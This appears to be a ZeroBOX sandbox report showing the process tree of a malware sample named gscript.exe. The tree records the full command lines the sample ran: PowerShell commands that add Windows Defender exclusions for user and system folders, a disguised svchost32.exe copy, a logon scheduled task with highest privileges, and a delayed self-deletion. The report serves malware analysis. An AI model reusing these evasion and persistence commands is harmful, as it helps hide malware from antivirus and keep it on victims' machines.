| ZeroBOX

gscript.exe "C:\Users\test22\AppData\Local\Temp\gscript.exe"
2648
- cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
  2228
  - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
    1536
  - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
    2976
  - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp'
    2724
  - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
    1204
- cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\gscript.exe"
  2692
  - svchost32.exe C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\gscript.exe"
    2288
    - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "gscript" /tr '"C:\Windows\system32\gscript.exe"' & exit
      2480
      - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "gscript" /tr '"C:\Windows\system32\gscript.exe"'
        1316
    - gscript.exe "C:\Windows\system32\gscript.exe"
      916
      - cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        2120
        
        powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
        2908
        
        powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
        2824
        
        powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp'
        1916
      - cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\gscript.exe"
        2760
        
        svchost32.exe C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\gscript.exe"
        2064
        
        cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "gscript" /tr '"C:\Windows\system32\gscript.exe"' & exit
        736
        
        schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "gscript" /tr '"C:\Windows\system32\gscript.exe"'
        2600
        
        sihost32.exe "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
        2756
    - cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe"
      2140
      - choice.exe choice /C Y /N /D Y /T 3
        2772

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents